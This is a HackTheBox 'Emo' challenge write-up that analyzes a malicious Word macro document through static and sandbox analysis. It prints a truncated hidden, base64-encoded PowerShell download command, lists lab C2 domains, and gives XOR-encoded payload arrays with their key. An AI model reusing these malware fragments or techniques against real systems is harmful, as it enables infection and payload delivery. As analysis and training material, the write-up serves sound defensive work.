We covered analyzing an office document that has an embedded Macro code written in Visual Basic. The document was claimed to cause ransomware infection so we performed a static analysis including extracting relevant strings, calculating the MD5 hash, metadata and revealing the hidden Macro routine using tools such as olevba. Then we submitted the hash to online analysis engines such as VirusTotal and it was found to be malicious in that it executes a Powershell command that contacts c2 server to download further payloads. We also found instances of XOR encryption along with the XOR key which then used to decrypt a characters that were encoded previously into decimal form. This was part of HackTheBox Emo challenge.
HackTheBox Emo Challenge Description
WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.
Incident Response Walkthrough: Analyzing a Malicious Word Document
As an incident responder, I step into the role of analyzing a malicious Microsoft Word document that contains embedded VBA macro code. This macro launches PowerShell, which in turn executes XOR-encrypted logic and attempts to contact a command-and-control (C2) server to download additional payloads onto the compromised host.
My first response is to isolate the infected machine, disconnect it from the internet, and create a full system image for forensic analysis.
Phase 1: Static Malware Analysis
I begin with static analysis — examining the file without executing it — to gather foundational information about the malware. This includes:
- Extracting readable strings from the file
- Calculating its MD5 hash
- Analyzing the macro content using tools like:
Through these tools, I extract the macro routines embedded in the document. These routines reveal the PowerShell command used to initiate the malware’s second stage.
Phase 2: Dynamic Analysis
Next, I move to dynamic analysis, executing the malicious document in a sandboxed environment (e.g., Any.Run or a secure VM) to observe its real-time behavior.
During this phase, I monitor:
- Spawned processes
- Network connections
- Registry modifications
- System events triggered
A critical tip here: while examining Event Viewer, I always correlate with the exact timestamp when the document was opened. For example, if I launched the file at 19:35, I filter events from that exact minute onward to focus my investigation.
Sandbox Report
I reviewed the dynamic analysis report on Any.Run. The malware reached out to several domains during execution, including:
CopyEditda-industrial.htb
daprofesional.htb
www.outspokenvisions.htb
dagranitegiare.htb
mobsouk.htb
biglaughs.htb
ngllogistics.htb
These are likely C2 servers or malicious infrastructure hosting second-stage payloads.
PowerShell Payload Extraction
From the dynamic analysis, I retrieved the encoded PowerShell command:
scssCopyEditPOwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPA
I decoded it using CyberChef:
- From Base64
- Remove null bytes
The decoded result revealed a larger payload that included XOR-encrypted values, notably in the following variable declarations:
powershellCopyEdit$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)
$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)
XOR Decryption Logic
To decrypt the above values:
- I used CyberChef’s “CharCode from Decimal” operation
- Then, applied XOR decryption with key
0xDF
This key was found in the decoded PowerShell:
powershellCopyEdit+= ([byte][char]${_} -bxor 0xdf )
By processing each array of integers through this operation, I successfully extracted plaintext strings and functionality, such as downloaded payloads, system manipulation commands, or even additional backdoors.
